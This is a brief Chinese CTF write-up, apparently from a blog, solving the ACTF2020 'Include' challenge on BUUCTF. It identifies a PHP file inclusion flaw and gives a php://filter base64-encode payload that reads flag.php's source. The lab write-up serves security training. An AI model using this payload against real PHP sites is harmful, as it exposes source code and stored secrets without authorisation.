0
点赞
收藏
分享

微信扫一扫

[ACTF2020 新生赛]Include1

清冷的蓝天天 2022-03-15 阅读 43
php安全web安全

进入靶场:

http://5c87b2e2-93dc-43b9-a974-51f8777f5ab9.node4.buuoj.cn:81

可以看见URL有?file=flag.php,猜测是不是文件包含漏洞。 

文件包含是直接读取文件的,所以要想办法获得文件源码。

构造payload:file=php://filter/convert.base64-encode/resource=flag.php

就可以直接访问文件源码了。

使用base64解码网址解码就可以获得flag了。

 

 

举报

相关推荐

[ACTF2020 新生赛]Include 1 -WP

phpweb安全

[ACTF2020 新生赛]BackupFile 1

phpWeb安全网络安全代码审计pythonyyds干货盘点

[ACTF2020 新生赛]Exec 1

linux查看源代码HarmonyOS后端开发

[WP][ACTF2020 新生赛]

php3dhtml编程语言

[ACTF2020 新生赛]BackupFile

web安全

[ACTF2020 新生赛]Exec1

http网络协议网络

[ACTF2020 新生赛]Upload1

区块链web3

BUUCTF:[ACTF2020 新生赛]Upload

htmlf53d代码人生

【BUUCTF]ACTF2020 新生赛Exec1write up

linux

buu-[ACTF新生赛2020]easyre

安全
0 条评论